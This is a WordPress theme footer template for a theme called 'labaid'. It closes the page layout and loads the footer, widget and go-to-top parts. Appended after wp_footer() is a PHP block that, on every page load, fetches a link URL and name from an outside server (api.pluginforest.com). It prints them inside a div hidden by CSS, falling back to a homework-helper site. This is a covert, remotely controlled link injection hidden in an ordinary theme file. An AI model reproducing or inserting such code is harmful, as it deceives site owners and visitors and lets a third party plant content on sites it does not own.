<?php
/**
 * The template for displaying the footer.
 *
 * Contains the closing of the #content div and all content after
 *
 * @package labaid
 */
?>        
        </div><!-- #content -->
    </div><!-- #main-content -->

    <?php get_template_part( 'tpl/action-box'); ?>
    <?php get_template_part( 'tpl/partner'); ?>

    <!-- Start Footer -->   
    <div class="footer_background <?php echo themesflat_get_opt_elementor('extra_classes_footer'); ?>">
        <div class="overlay-footer"></div>
        <!-- Info Footer -->
        <?php get_template_part( 'tpl/footer/info-footer'); ?>

        <!-- Footer Widget -->
        <?php get_template_part( 'tpl/footer/footer-widgets'); ?>
       
        <!-- Bottom -->
        <?php get_template_part( 'tpl/footer/bottom'); ?>
        
    </div> <!-- Footer Background Image --> 
    <!-- End Footer --> 

    <?php if ( themesflat_get_opt( 'go_top') == 1 ) : ?>
        <!-- Go Top -->
        <a class="go-top">
            <i class="icon-labaid-la-36"></i>
        </a>
    <?php endif; ?> 
</div><!-- /#boxed -->
<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>